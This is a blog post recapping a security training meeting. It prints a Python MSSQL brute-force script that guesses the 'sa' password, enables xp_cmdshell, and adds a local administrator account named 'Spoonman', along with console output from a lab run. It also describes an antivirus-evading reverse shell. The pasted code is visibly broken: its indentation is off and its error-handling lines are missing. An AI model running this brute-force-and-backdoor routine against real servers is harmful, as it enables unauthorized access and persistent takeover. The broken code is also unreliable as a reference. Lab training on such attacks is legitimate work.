Archive for July, 2011

Reverse Shell/SQL Brute (Python)

This month, R3L1K was back for the 6th meeting of the Offensive Security Ohio Chapter.  The focus for this class was Python scripting.  He first walked us through a 13 line reverse shell script that he wrote, which is currently undetectable by any antivirus vendor, as tested by VirusTotal.  The complete writeup and code is as on R3L1K’s site (SecManiac).  The only snag we hit, while trying to compile the script into a windows executable using PyInstaller, was that we needed to  install a version of PyWin32 specific to the version of Python currently installed on our host.  Also, the code must be compiled on the same operating system as the target that it will be running on.  So, if you want to compile a python executable for Windows, it must be compiled on Windows.  There is no cross-compile support.  Otherwise, this was a fun little PoC.

The next script we worked on was a simple SQL brute force script.


import _mssql

# mssql = _mssql.connect('ip', 'username', 'password')
# mssql.execute_query()

passwords = file("pass.txt", "r")
ip = ""

for password in passwords:
    password = password.rstrip()
        mssql = _mssql.connect(ip, "sa", password)

        print "[*] Successful login with username 'sa' and password: " + password
        print "[*] Enabling 'xp_cmdshell'"
        mssql.execute_query("EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec SP_CONFIGURE 'xp_cmdshell', 1;RECONFIGURE;")

        print "[*] Adding Administrative user"
        mssql.execute_query("xp_cmdshell 'net user Spoonman Password! /ADD && net localgroup administrators Spoonman /ADD'")

        print "[*] Success!"

        print "[!] Failed login for username 'sa' and password: " + password


To get this script working properly on BackTrack 5, we had to first install the python-pymssql module (“apt-get install python-pymssql”).  This script simply reads each line of “pass.txt” and tries to connect to the remote host using the “_mssql.connect” command by passing it the username “sa” and the password read from “pass.txt”.  If the connection is successful, it outputs it’s progress to the console using the “print” command, then tries to enable the “xp_cmdshell” module within SQL.  The “xp_cmdshell” module allows us to send shell commands to the remote host as  a SQL query statement.  The shell command we send is simply to add a new user, then add that user to the local administrators group.  Let’s run the script against our Metasploit Unleashed XP Build.

[email protected]:~# python
[!] Failed login for username 'sa' and password: test
[!] Failed login for username 'sa' and password: password
[*] Successful login with username 'sa' and password: password1
[*] Enabling 'xp_cmdshell'
[*] Adding Administrative user
[*] Success!


Let’s check to see if our administrative account was actually created.

It worked!  Next month, R3L1k promissed to get back into exploit development with an SEH example.  See you then!

No Comments